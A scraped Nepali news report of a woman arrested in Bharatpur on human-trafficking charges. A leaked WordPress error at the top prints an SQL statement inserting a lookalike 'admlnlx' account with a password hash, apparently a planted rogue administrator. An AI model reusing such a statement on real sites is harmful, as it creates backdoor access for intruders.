WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7WNfmri9kM3vLepDX8sbJsyVOyeu.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:54:56', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । जिल्ला प्रहरी कार्यालयले मानव बेचबिखन गरेको आरोपमा एक जनालाई पक्राउ गरेको छ । पक्राउ पर्नेमा तनहुँ पोखरीभञ्याङ गाउँपालिका–५ की ४० वर्षीया कल्पना महरा रहेको प्रहरीले जनाएको छ ।
कार्यालयका सूचना अधिकारी नरहरि अधिकारीका अनुसार भरतपुर महानगरपालिका–१ मा कल्पना होटल एण्ड गेष्टहाउस सञ्चालन गर्दै आएकी महरालाई पक्राउ गरिएको हो । महराले २२ वर्षीया युवतीलाई ललाइफकाइ अनैतिक कार्य गराई मानव बेचबिखन तथा ओसारपसार कार्य गरेको आरोपमा पक्राउ गरिएको उहाँले जानकारी दिए । पक्राउ परेकी उनलाई मानव बेचबिखन तथा ओसारपसार मुद्दामा म्याद थप गरी अनुसन्धान सुरु गरिएको कार्यालयले जनाएको छ । रासस